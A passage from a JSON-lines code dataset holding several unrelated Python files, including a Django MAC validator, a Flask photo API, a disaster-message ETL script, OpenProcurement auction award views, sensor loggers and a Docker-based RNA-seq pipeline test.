docs_class)[1]))","sub_path":"RNN/RNN.py","file_name":"RNN.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"645403120","text":"# encoding: utf-8\nfrom django.core.exceptions import ValidationError\nimport re\n\n\nmac_pattern = re.compile(r'^([0-9a-f]{2}:){5}[0-9a-f]{2}$')\n\ndef validate_mac(mac):\n if mac == '00:00:00:00:00:00':\n raise ValidationError('Invalid MAC address—to disable DHCP for this '\n 'interface, uncheck \"Enable DHCP\"')\n elif not mac_pattern.match(mac):\n raise ValidationError('Invalid MAC address')\n","sub_path":"cyder/cydhcp/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"136673715","text":"\"\"\"\nThis is the Live Photos module supporting all the ReST actions\n\"\"\"\n\n# App modules\nfrom utils import *\n\n# 3rd party modules\nfrom flask import make_response, abort\n\n# Data to serve with our API\nLIVE_PHOTOS = {\n \"Storage::Photos::Asset::OXZsVTFlaEhSNjBFc1doaWVxM0xGdz09\": {\n\t\t\"Identifier\": \"Storage::Photos::Asset::OXZsVTFlaEhSNjBFc1doaWVxM0xGdz09\",\n\t\t\"IsLivePhoto\": True,\n\t\t\"Mime\": \"image/jpeg\",\n\t\t\"Timestamp\": \"2017-05-26T14:16:51\",\n\t\t\"TimestampKind\": \"Utc\"\n },\n \"Storage::Photos::Asset::NUd0V2llYVpiekpTK0lOOUF2YndYZz09\": {\n\t\t\"Identifier\": \"Storage::Photos::Asset::NUd0V2llYVpiekpTK0lOOUF2YndYZz09\",\n\t\t\"IsLivePhoto\": True,\n\t\t\"Mime\": \"image/jpeg\",\n\t\t\"Timestamp\": \"2017-05-26T14:15:11\",\n\t\t\"TimestampKind\": \"Utc\"\n },\n 
\"Storage::Photos::Asset::ZWhOdEVOWEgxaWJJU2JLRzhHSW1Qdz09\": {\n\t\t\"Identifier\": \"Storage::Photos::Asset::ZWhOdEVOWEgxaWJJU2JLRzhHSW1Qdz09\",\n\t\t\"IsLivePhoto\": True,\n\t\t\"Mime\": \"image/jpeg\",\n\t\t\"Timestamp\": \"2017-04-07T14:57:34\",\n\t\t\"TimestampKind\": \"Utc\"\n },\n}\n\ndef upload_photo(upfile):\n\t# Calculate MD5 hash of the uploaded file before it is saved!\n\thash_value = calculate_file_hash(upfile)\n\tidentifier = make_asset_identifier(hash_value)\n\treturn \"File: %s, Asset identifier: %s\" % (upfile.filename, identifier)\n\ndef read_all():\n \"\"\"\n This function responds to a request for /photos/live\n with the complete lists of Live Photos\n\n :return: json string of Live Photos\n \"\"\"\n return list(LIVE_PHOTOS.values())\n\n\n# def read_one(lname):\n# \"\"\"\n# This function responds to a request for /api/people/{lname}\n# with one matching person from people\n# \n# :param lname: last name of person to find\n# :return: person matching last name\n# \"\"\"\n# # Does the person exist in people?\n# if lname in PEOPLE:\n# person = PEOPLE.get(lname)\n# \n# # otherwise, nope, not found\n# else:\n# abort(\n# 404, \"Person with last name {lname} not found\".format(lname=lname)\n# )\n# \n# return person\n# \n# \n# def create(person):\n# \"\"\"\n# This function creates a new person in the people structure\n# based on the passed in person data\n# \n# :param person: person to create in people structure\n# :return: 201 on success, 406 on person exists\n# \"\"\"\n# lname = person.get(\"lname\", None)\n# fname = person.get(\"fname\", None)\n# \n# # Does the person exist already?\n# if lname not in PEOPLE and lname is not None:\n# PEOPLE[lname] = {\n# \"lname\": lname,\n# \"fname\": fname,\n# \"timestamp\": get_timestamp(),\n# }\n# return make_response(\n# \"{lname} successfully created\".format(lname=lname), 201\n# )\n# \n# # Otherwise, they exist, that's an error\n# else:\n# abort(\n# 406,\n# \"Peron with last name {lname} already exists\".format(lname=lname),\n# )\n# \n# \n# def update(lname, person):\n# \"\"\"\n# This function updates an existing person in the people structure\n# \n# :param lname: last name of person to update in the people structure\n# :param person: person to update\n# :return: updated person structure\n# \"\"\"\n# # Does the person exist in people?\n# if lname in PEOPLE:\n# PEOPLE[lname][\"fname\"] = person.get(\"fname\")\n# PEOPLE[lname][\"timestamp\"] = get_timestamp()\n# \n# return PEOPLE[lname]\n# \n# # otherwise, nope, that's an error\n# else:\n# abort(\n# 404, \"Person with last name {lname} not found\".format(lname=lname)\n# )\n# \n# \n# def delete(lname):\n# \"\"\"\n# This function deletes a person from the people structure\n# \n# :param lname: last name of person to delete\n# :return: 200 on successful delete, 404 if not found\n# \"\"\"\n# # Does the person to delete exist?\n# if lname in PEOPLE:\n# del PEOPLE[lname]\n# return make_response(\n# \"{lname} successfully deleted\".format(lname=lname), 200\n# )\n# \n# # Otherwise, nope, person to delete not found\n# else:\n# abort(\n# 404, \"Person with last name {lname} not found\".format(lname=lname)\n# )\n","sub_path":"live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"475549905","text":"import sys\nimport pandas as pd\nimport numpy as np\nfrom sqlalchemy import create_engine\n\ndef load_data(messages_filepath, categories_filepath):\n ''' load and merge two datasets.\n 
Args:\n messages_filepath: string; filepath for csv file containing messages dataset.\n categories_filepath: string; filepath for csv file containing categories dataset.\n \n Returns:\n df: dataframe; a merged dataframe containing messages and categories datasets.\n '''\n\n # Load messages and categories datasets\n messages = pd.read_csv(messages_filepath) # 'messages.csv'\n categories = pd.read_csv(categories_filepath) # 'categories.csv'\n\n # Merge two datasets\n df = messages.merge(categories, on = 'id', how = 'inner')\n\n return df\n\n\ndef clean_data(df):\n ''' clean dataframe by \n - converting categories from string to numeric values;\n - removing columns with unique value or removing records with non-binary values; and\n - removing duplicated records\n\n Args:\n df: dataframe; a merged dataframe from load_data() \n \n Returns:\n df: dataframe; a cleaned dataframe containing messages and categories information.\n '''\n # Create a dataframe of the 36 individual category columns \n categories = df.categories.str.split(pat = ';', expand = True)\n\n # Select the first row of the categories dataframe\n # and use this row to extract a list of new column names for categories.\n row = categories.iloc[0, :]\n category_colnames = row.apply(lambda x: x[:-2]).tolist()\n categories.columns = category_colnames\n\n # Convert string values to a numeric value\n for column in categories:\n # replace original value to be the last character of the string\n categories[column] = categories[column].apply(lambda x: x[-1:])\n # convert dtype from string to numeric\n categories[column] = pd.to_numeric(categories[column])\n\n # Replace the original caategories column with the new categories dataframe\n df = pd.concat([df.drop('categories', axis = 1), categories], axis = 1)\n\n # Remove duplicates \n df.drop_duplicates(inplace = True)\n\n # Drop columns if the column has only one (unique) value\n # and drop records if any of the column has non-binary values (vales other than 0 or 1)\n for col in df.columns[4:]: \n # display(col)\n if len(pd.unique(df[col])) == 1:\n df.drop(col, axis = 1, inplace = True)\n print(' {} column with a unigue value is dropped'.format(col))\n continue\n \n if len(pd.unique(df[col])) != 2:\n target = pd.unique(df[col])[-1]\n df = df.loc[df[col] != target, :]\n print(' Records with value {} in the {} column are dropped'.format(target, col))\n\n\n return df\n\n\ndef save_data(df, database_filename):\n\n engine = create_engine('sqlite:///' + database_filename)\n df.to_sql('msg_categories', engine, index = False, if_exists = 'replace')\n pass \n\n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()","sub_path":"Part 9. 
Data Engineering/Project: Disaster Response Pipelines/data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"375444243","text":"#######\nimport numpy as np\nimport SLSim as sl\nfrom scipy import io as sio\n\nstride = 1 # \nmy_sim = sl.mockSimulation()\nmy_sim.tp = sio.mmread('tProb.mtx')\nmy_sim.x = np.load('Gens_aloopRMSD.npy')\nmy_sim.y = np.load('Gens_y_KE.npy')\nmy_sim.mapping = np.load('map_Macro2micro.npy')\n\nfor i in range(100):\n\ttry:\n\t\txedges = np.linspace(0, 1, num=41)\n\t\tyedges = np.linspace(0, 2, num=41)\n\n\t\ttrjs = np.load('trjs_theta'+str(i)+'.npy')\n\t\t#trj_x, trj_y = my_sim.map(trjs)\n\t\n\t\tphi_all = trjs[0]\n\t\tpsi_all = trjs[1]\n\t\tphi = []\n\t\tpsi = []\n\t\tdata = []\n\t\tfor frame in range(len(phi_all)):\n\t\t phi.append(phi_all[frame])\n\t\t psi.append(psi_all[frame])\n\t\t H, xedges, yedges = np.histogram2d(phi, psi, bins=(xedges, yedges))\n\t\t H0 = np.nonzero(np.concatenate(H))\n\t\t n_states = len(H0[0])\n\t\t data.append([frame, n_states])\n\t\tnp.save('n_discoveredS_time'+str(i)+'.npy', data)\n\texcept:\n\t\tprint(i)\n\t\t\n\n\n\n","sub_path":"MDSimulation/Src/nBins/RL/timeVsBins-1.py","file_name":"timeVsBins-1.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"473716290","text":"#!/usr/bin/python\nfrom Adafruit_BME280 import *\nfrom math import log\nimport datetime as dt\nimport re\n\nsensor = BME280(t_mode=BME280_OSAMPLE_8, p_mode=BME280_OSAMPLE_8, h_mode=BME280_OSAMPLE_8)\n\n# Pressure logging\ndegrees = sensor.read_temperature()\npascals = sensor.read_pressure()\nhectopascals = pascals / 100\n\nwith open(\"/home/pi/balloonS/sensor_logs/press_log\", mode = \"a+\") as press_log:\t\n\ttime_stamp = dt.datetime.now().strftime('[%Y-%m-%d %H:%M:%S]')\n\tpress_log.write(time_stamp + \" p=\" + str(hectopascals) + \"hPa\\n\")\n\n# Altitude logging\nPRESS0 = 1013.25\t# Pressure at sea level (hPa)\nu = 0.0289644\t\t# Molar mas of air\ng = 9.8101\t\t\t# Standard acceleration\nR = 8.314458948\t\t# Universal gas constant\n\nwith open(\"/home/pi/balloonS/sensor_logs/temp_log\", mode = \"r\") as temp_log:\n\ttemp_log.seek(2)\n\tline = temp_log.readline()\n\ttemp = re.search(r'(?<=t=)[0-9]*', line).group()\n\t\n# Calculate altitude\nalt = - (R * (float(temp) + 273) * log(hectopascals / PRESS0) / (u * g))\n\nwith open(\"/home/pi/balloonS/sensor_logs/alt_log\", mode = \"a+\") as alt_log:\t\n\ttime_stamp = dt.datetime.now().strftime('[%Y-%m-%d %H:%M:%S]')\n\talt_log.write(time_stamp + \" a=\" + str(alt) + \"m\\n\")","sub_path":"press_alt_logger.py","file_name":"press_alt_logger.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"432175320","text":"from recursion.Swap_Nodes_in_Pairs.main import Solution, ListNode\n\n\ndef test_swapPairs():\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(3)\n head.next.next.next = ListNode(4)\n\n expected = ListNode(2)\n expected.next = ListNode(1)\n expected.next.next = ListNode(4)\n expected.next.next.next = ListNode(3)\n\n solution = Solution()\n solution.swapPairs(head)\n while expected:\n print(\"hey\", head.val, expected.val)\n assert head.val == expected.val\n head = head.next\n expected = 
expected.next\n","sub_path":"recursion/Swap_Nodes_in_Pairs/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"71630274","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom oauth2client.file import Storage\nfrom oauth2client.client import flow_from_clientsecrets\nfrom apiclient.discovery import build\n\nimport httplib2\nimport pprint\n\nimport logging \nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nBASE_INFO = {\n \"app\":\"gdcmdtools\",\n \"description\":'Google Drive command line tools',\n \"version\":'0.97'}\n\nGDAPI_VER = 'v2'\nFTAPI_VER = 'v1'\nDISCOVERY_URL = \"https://www.googleapis.com/discovery/v1/apis/{api}/{apiVersion}/rest\"\n\nDEBUG_LEVEL = ('debug', 'info', 'warning', 'error', 'critical')\n\nclass GDBase(object):\n def __init__(self):\n self.drive_service = None\n self.ft_service = None\n self.http = None\n self.root_folder = None\n\n def get_root(self):\n if self.root_folder == None:\n if self.drive_service == None:\n self.get_drive_service()\n about = self.drive_service.about().get().execute()\n \n self.root_folder = about['rootFolderId']\n logger.debug(\"root_folder=%s\" % self.root_folder)\n return self.root_folder\n\n def get_drive_service(self, http):\n self.drive_service = build('drive', GDAPI_VER, \n discoveryServiceUrl=DISCOVERY_URL, http=http)\n\n return self.drive_service\n\n def get_ft_service(self, http):\n self.ft_service = build('fusiontables', FTAPI_VER, \n discoveryServiceUrl=DISCOVERY_URL, http=http)\n\n return self.ft_service\n\n\n","sub_path":"gdcmdtools/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"94607527","text":"# -*- coding: utf-8 -*-\nfrom openprocurement.api.utils import (\n json_view,\n context_unpack,\n APIResource,\n get_now,\n)\nfrom openprocurement.auctions.core.utils import (\n apply_patch,\n save_auction,\n opresource,\n)\nfrom openprocurement.auctions.core.validation import (\n validate_award_data,\n validate_patch_award_data,\n validate_award_data_post_common,\n validate_patch_award_data_patch_common,\n)\nfrom openprocurement.auctions.core.plugins.awarding.base.utils import (\n check_auction_protocol\n)\n\n\n@opresource(\n name='awarding_3_0:Auction Awards',\n collection_path='/auctions/{auction_id}/awards',\n path='/auctions/{auction_id}/awards/{award_id}',\n awardingType='awarding_3_0',\n description=\"Auction awards\"\n)\nclass AuctionAwardResource(APIResource):\n\n @json_view(permission='view_auction')\n def collection_get(self):\n \"\"\"Auction Awards List\n\n Get Awards List\n ---------------\n\n Example request to get awards list:\n\n .. sourcecode:: http\n\n GET /auctions/4879d3f8ee2443169b5fbbc9f89fa607/awards HTTP/1.1\n Host: example.com\n Accept: application/json\n\n This is what one should expect in response:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n\n {\n \"data\": [\n {\n \"status\": \"active\",\n \"suppliers\": [\n {\n \"id\": {\n \"name\": \"Державне управління справами\",\n \"scheme\": \"https://ns.openprocurement.org/ua/edrpou\",\n \"uid\": \"00037256\",\n \"uri\": \"http://www.dus.gov.ua/\"\n },\n \"address\": {\n \"countryName\": \"Україна\",\n \"postalCode\": \"01220\",\n \"region\": \"м. Київ\",\n \"locality\": \"м. Київ\",\n \"streetAddress\": \"вул. 
Банкова, 11, корпус 1\"\n }\n }\n ],\n \"value\": {\n \"amount\": 489,\n \"currency\": \"UAH\",\n \"valueAddedTaxIncluded\": true\n }\n }\n ]\n }\n\n \"\"\"\n return {'data': [i.serialize(\"view\") for i in self.request.validated['auction'].awards]}\n\n @json_view(content_type=\"application/json\", permission='create_award',\n validators=(validate_award_data, validate_award_data_post_common))\n def collection_post(self):\n \"\"\"Accept or reject bidder application\n\n Creating new Award\n ------------------\n\n Example request to create award:\n\n .. sourcecode:: http\n\n POST /auctions/4879d3f8ee2443169b5fbbc9f89fa607/awards HTTP/1.1\n Host: example.com\n Accept: application/json\n\n {\n \"data\": {\n \"status\": \"active\",\n \"suppliers\": [\n {\n \"id\": {\n \"name\": \"Державне управління справами\",\n \"scheme\": \"https://ns.openprocurement.org/ua/edrpou\",\n \"uid\": \"00037256\",\n \"uri\": \"http://www.dus.gov.ua/\"\n },\n \"address\": {\n \"countryName\": \"Україна\",\n \"postalCode\": \"01220\",\n \"region\": \"м. Київ\",\n \"locality\": \"м. Київ\",\n \"streetAddress\": \"вул. Банкова, 11, корпус 1\"\n }\n }\n ],\n \"value\": {\n \"amount\": 489,\n \"currency\": \"UAH\",\n \"valueAddedTaxIncluded\": true\n }\n }\n }\n\n This is what one should expect in response:\n\n .. sourcecode:: http\n\n HTTP/1.1 201 Created\n Content-Type: application/json\n\n {\n \"data\": {\n \"id\": \"4879d3f8ee2443169b5fbbc9f89fa607\",\n \"date\": \"2014-10-28T11:44:17.947Z\",\n \"status\": \"active\",\n \"suppliers\": [\n {\n \"id\": {\n \"name\": \"Державне управління справами\",\n \"scheme\": \"https://ns.openprocurement.org/ua/edrpou\",\n \"uid\": \"00037256\",\n \"uri\": \"http://www.dus.gov.ua/\"\n },\n \"address\": {\n \"countryName\": \"Україна\",\n \"postalCode\": \"01220\",\n \"region\": \"м. Київ\",\n \"locality\": \"м. Київ\",\n \"streetAddress\": \"вул. Банкова, 11, корпус 1\"\n }\n }\n ],\n \"value\": {\n \"amount\": 489,\n \"currency\": \"UAH\",\n \"valueAddedTaxIncluded\": true\n }\n }\n }\n\n \"\"\"\n award = self.request.validated['award']\n period = {'startDate': get_now()}\n award.complaintPeriod = award.signingPeriod = period\n award.verificationPeriod = period\n self.request.validated['auction'].awards.append(award)\n if save_auction(self.request):\n self.LOGGER.info('Created auction award {}'.format(award.id),\n extra=context_unpack(self.request,\n {'MESSAGE_ID': 'auction_award_create'},\n {'award_id': award.id}))\n self.request.response.status = 201\n route = self.request.matched_route.name.replace(\"collection_\", \"\")\n headers_locations = self.request.current_route_url(_route_name=route,\n award_id=award.id,\n _query={})\n self.request.response.headers['Location'] = headers_locations\n return {'data': award.serialize(\"view\")}\n\n @json_view(permission='view_auction')\n def get(self):\n \"\"\"Retrieving the award\n\n Example request for retrieving the award:\n\n .. sourcecode:: http\n\n GET /auctions/4879d3f8ee2443169b5fbbc9f89fa607/awards/71b6c23ed8944d688e92a31ec8c3f61a HTTP/1.1\n Host: example.com\n Accept: application/json\n\n And here is the response to be expected:\n\n .. 
sourcecode:: http\n\n HTTP/1.0 200 OK\n Content-Type: application/json\n\n {\n \"data\": {\n \"id\": \"4879d3f8ee2443169b5fbbc9f89fa607\",\n \"date\": \"2014-10-28T11:44:17.947Z\",\n \"status\": \"active\",\n \"suppliers\": [\n {\n \"id\": {\n \"name\": \"Державне управління справами\",\n \"scheme\": \"https://ns.openprocurement.org/ua/edrpou\",\n \"uid\": \"00037256\",\n \"uri\": \"http://www.dus.gov.ua/\"\n },\n \"address\": {\n \"countryName\": \"Україна\",\n \"postalCode\": \"01220\",\n \"region\": \"м. Київ\",\n \"locality\": \"м. Київ\",\n \"streetAddress\": \"вул. Банкова, 11, корпус 1\"\n }\n }\n ],\n \"value\": {\n \"amount\": 489,\n \"currency\": \"UAH\",\n \"valueAddedTaxIncluded\": true\n }\n }\n }\n\n \"\"\"\n return {'data': self.request.validated['award'].serialize(\"view\")}\n\n @json_view(content_type=\"application/json\", permission='edit_auction_award',\n validators=(validate_patch_award_data, validate_patch_award_data_patch_common))\n def patch(self):\n \"\"\"Update of award\n\n Example request to change the award:\n\n .. sourcecode:: http\n\n PATCH /auctions/4879d3f8ee2443169b5fbbc9f89fa607/awards/71b6c23ed8944d688e92a31ec8c3f61a HTTP/1.1\n Host: example.com\n Accept: application/json\n\n {\n \"data\": {\n \"value\": {\n \"amount\": 600\n }\n }\n }\n\n And here is the response to be expected:\n\n .. sourcecode:: http\n\n HTTP/1.0 200 OK\n Content-Type: application/json\n\n {\n \"data\": {\n \"id\": \"4879d3f8ee2443169b5fbbc9f89fa607\",\n \"date\": \"2014-10-28T11:44:17.947Z\",\n \"status\": \"active\",\n \"suppliers\": [\n {\n \"id\": {\n \"name\": \"Державне управління справами\",\n \"scheme\": \"https://ns.openprocurement.org/ua/edrpou\",\n \"uid\": \"00037256\",\n \"uri\": \"http://www.dus.gov.ua/\"\n },\n \"address\": {\n \"countryName\": \"Україна\",\n \"postalCode\": \"01220\",\n \"region\": \"м. Київ\",\n \"locality\": \"м. Київ\",\n \"streetAddress\": \"вул. 
Банкова, 11, корпус 1\"\n }\n }\n ],\n \"value\": {\n \"amount\": 600,\n \"currency\": \"UAH\",\n \"valueAddedTaxIncluded\": true\n }\n }\n }\n\n \"\"\"\n auction = self.request.validated['auction']\n award = self.request.context\n current_award_status = award.status\n now = get_now()\n if current_award_status in ['unsuccessful', 'cancelled']:\n self.request.errors.add(\n 'body',\n 'data',\n 'Can\\'t update award in current ({}) status' .format(current_award_status)\n )\n self.request.errors.status = 403\n return\n\n apply_patch(self.request, save=False, src=self.request.context.serialize())\n new_award_status = award.status\n\n if current_award_status == 'pending.waiting' and new_award_status == 'cancelled':\n if self.request.authenticated_role == 'bid_owner':\n award.complaintPeriod.endDate = now\n else:\n self.request.errors.add(\n 'body',\n 'data',\n 'Only bid owner may cancel award in current ({}) status'.format(current_award_status)\n )\n self.request.errors.status = 403\n return\n\n elif current_award_status == 'pending' and new_award_status == 'active':\n if check_auction_protocol(award):\n award.verificationPeriod.endDate = now\n else:\n self.request.errors.add(\n 'body',\n 'data',\n 'Can\\'t switch award status to (active) before'\n ' auction owner load auction protocol'\n )\n self.request.errors.status = 403\n return\n\n award.complaintPeriod.endDate = now\n auction.contracts.append(type(auction).contracts.model_class({\n 'awardID': award.id,\n 'suppliers': award.suppliers,\n 'value': award.value,\n 'date': get_now(),\n 'items': auction.items,\n 'contractID': '{}-{}{}'.format(\n auction.auctionID,\n self.server_id,\n len(auction.contracts) + 1\n ),\n 'signingPeriod': award.signingPeriod,\n }))\n auction.status = 'active.awarded'\n auction.awardPeriod.endDate = now\n elif current_award_status != 'pending.waiting' and new_award_status == 'unsuccessful':\n if current_award_status == 'pending':\n award.verificationPeriod.endDate = now\n elif current_award_status == 'active':\n contract = None\n for contract in auction.contracts:\n if contract.awardID == award.id:\n break\n if getattr(contract, 'dateSigned', False):\n err_message = 'You cannot disqualify the bidder the contract for whom has already been downloaded.'\n self.request.errors.add('body', 'data', err_message)\n self.request.errors.status = 403\n return\n award.signingPeriod.endDate = now\n auction.awardPeriod.endDate = None\n auction.status = 'active.qualification'\n for i in auction.contracts:\n if i.awardID == award.id:\n i.status = 'cancelled'\n award.complaintPeriod.endDate = now\n self.request.content_configurator.back_to_awarding()\n elif current_award_status != new_award_status:\n self.request.errors.add(\n 'body',\n 'data',\n 'Can\\'t switch award ({0}) status to ({1}) status'.format(\n current_award_status,\n new_award_status\n )\n )\n self.request.errors.status = 403\n return\n\n if save_auction(self.request):\n self.LOGGER.info(\n 'Updated auction award {}'.format(self.request.context.id),\n extra=context_unpack(\n self.request,\n {'MESSAGE_ID': 'auction_award_patch'}\n )\n )\n return {'data': award.serialize(\"view\")}\n","sub_path":"openprocurement/auctions/core/plugins/awarding/v3/views/award.py","file_name":"award.py","file_ext":"py","file_size_in_byte":15199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"224677729","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nscraper_tests.test_main - tests for MetaFilter 
interaction\n\n\"\"\"\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport datetime\nimport unittest\n\nfrom scraper.__main__ import get_url_details, process_metafilter_urls\nfrom scraper.utils import datetime_to_utc_timestamp\n\n\nclass TestMain(unittest.TestCase):\n \"\"\"\n Test case for the \"main\" module.\n\n \"\"\"\n def test_url_reddit_wins(self):\n \"\"\"Tests the URL details method when Reddit wins\"\"\"\n url = \"https://www.theguardian.com/lifeandstyle/2016/aug/31/new-york\" \\\n \"-city-subway-trains-noise-pollution-jet-engine\"\n metafilter_time = datetime_to_utc_timestamp(datetime.datetime(\n 2016, 9, 1, 3, 39, 0), \"UTC\")\n expected_reddit_time = datetime_to_utc_timestamp(datetime.datetime(\n 2016, 9, 1, 1, 27, 21), \"UTC\")\n\n details = get_url_details(url, metafilter_time)\n\n self.assertEqual(details['winner'], 'reddit')\n self.assertEqual(details['reddit_time'], expected_reddit_time)\n\n def test_url_metafilter_wins(self):\n \"\"\"Tests the URL details when MetaFilter wins\"\"\"\n url = \"https://www.theguardian.com/lifeandstyle/2016/aug/31/new-york\" \\\n \"-city-subway-trains-noise-pollution-jet-engine\"\n # moved back from actual metafilter_time for test purposes\n metafilter_time = datetime_to_utc_timestamp(datetime.datetime(\n 2016, 8, 1, 3, 39, 0), \"UTC\")\n\n details = get_url_details(url, metafilter_time)\n\n self.assertEqual(details['winner'], 'metafilter')\n\n def test_get_url_details_draw(self):\n \"\"\"Tests the URL details when the result is a draw\"\"\"\n url = \"https://www.theguardian.com/lifeandstyle/2016/aug/31/new-york\" \\\n \"-city-subway-trains-noise-pollution-jet-engine\"\n # moved back from actual metafilter_time for test purposes\n metafilter_time = datetime_to_utc_timestamp(datetime.datetime(\n 2016, 9, 1, 1, 27, 21), \"UTC\")\n\n details = get_url_details(url, metafilter_time)\n\n self.assertEqual(details['winner'], 'draw')\n\n def test_process(self):\n \"\"\"Tests the URL processing function\"\"\"\n metafilter_urls = [\n # these two are reddit winners\n {\n 'url': 'http://nymag.com/selectall/2016/08/the-secret-furry' \\\n '-patrons-keeping-indie-artists-afloat.html',\n 'datetime': 1472713080\n },\n {\n 'url': 'http://www.latimes.com/projects/la-me-framed/',\n 'datetime': 1472705520\n },\n # these two are MetaFilter winners\n {\n 'url': 'http://www.commondreams.org/news/2016/08/30/how-isds' \\\n '-playground-ultra-wealthy-corrupt-and-criminal',\n 'datetime': 1472672040\n },\n {\n 'url': 'https://vimeo.com/180668935',\n 'datetime': 1472595360\n }\n ]\n scores, _ = process_metafilter_urls(metafilter_urls)\n self.assertEqual(scores['reddit'], 2)\n self.assertEqual(scores['metafilter'], 2)\n","sub_path":"scraper_tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"92607271","text":"import io\nimport os\nimport setuptools\n\n# pip workaround\nos.chdir(os.path.abspath(os.path.dirname(__file__)))\n\nwith io.open('README.rst', encoding='utf-8') as fp:\n long_description = fp.read()\nsetuptools.setup(\n name = 'reprounzip-containerexec',\n version = '1.0',\n author = 'Dirk Beyer',\n description = \"An unpacker for reprozip using the container technology of BenchExec\",\n long_description = long_description,\n url = 'https://www.reprozip.org',\n license = 'BSD-3-Clause',\n keywords = [\n 'reprozip', 'reprounzip', 'reproducibility', 'provenance',\n 'benchexec', 'containerexec', 'container'],\n 
classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Topic :: Scientific/Engineering',\n 'Topic :: System :: Archiving'],\n platforms = ['Linux'],\n\n packages = ['reprounzip', 'reprounzip.unpackers'],\n entry_points = {\n 'reprounzip.unpackers': [\n 'containerexec = reprounzip.unpackers.containerexec:setup']\n },\n namespace_packages = ['reprounzip', 'reprounzip.unpackers'],\n install_requires = [\n 'reprounzip>=1.0.8',\n 'rpaths>=0.8',\n 'benchexec>=1.11',\n ],\n zip_safe = True,\n )\n","sub_path":"reprounzip-containerexec/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"49874423","text":"import datetime\nimport json\nimport csv\n\ndate1 = '2016-08-01'\ndate2 = '2017-07-31'\nstart = datetime.datetime.strptime(date1, '%Y-%m-%d')\nend = datetime.datetime.strptime(date2, '%Y-%m-%d')\nstep = datetime.timedelta(days=1)\ndates = [\"dato\"]\n\nwhile start <= end:\n dates.append(str(start.date()))\n start += step\n\nwith open('temp.csv', 'w') as csvFile:\n wrt = csv.writer(csvFile)\n for row in dates:\n wrt.writerow([row])\n\ncsvFile.close()\n\nwith open('temp.csv', 'r') as inp, \\\n open('datoer.json', 'w') as outp:\n reader = csv.DictReader(inp)\n out = json.dumps([row for row in reader], ensure_ascii=False, encoding=\"utf-8\", sort_keys=True,\n indent=4, separators=(',', ': '))\n outp.write(out)\n\ninp.close()\noutp.close()\n\n","sub_path":"genrateDates.py","file_name":"genrateDates.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"18860665","text":"#!/usr/bin/env python2.7\nimport subprocess\nimport sys\nimport unittest\n\n\nclass TestRNASeqPipeline(unittest.TestCase):\n\n def test_docker_call(self):\n # print sys.argv\n tool = ['quay.io/ucsc_cgl/rnaseq-cgl-pipeline:1.9.1--{}'.format(tag)]\n base = ['docker', 'run']\n args = ['--star=/foo', '--rsem=/foo', '--kallisto=/foo', '--samples=/foo']\n sock = ['-v', '/var/run/docker.sock:/var/run/docker.sock']\n mirror = ['-v', '/foo:/foo']\n sample = ['-v', '/bar:/samples']\n inputs = ['-v', '/foobar:/inputs']\n # Check base call for help menu\n out = check_docker_output(command=base + tool, assert_1=False)\n self.assertTrue('Please see the complete documentation' in out)\n self.assertFalse('foo bar' in out)\n # Check for required mirror mounts\n self.assertTrue('Wrong number of mirror mounts' in check_docker_output(base + sock + tool + args))\n # Check for mirror mount when input/sample mount is used\n self.assertTrue('Wrong number of mirror mounts' in\n check_docker_output(base + sock + sample + inputs + tool + args))\n # Check for more than one mirror mount\n 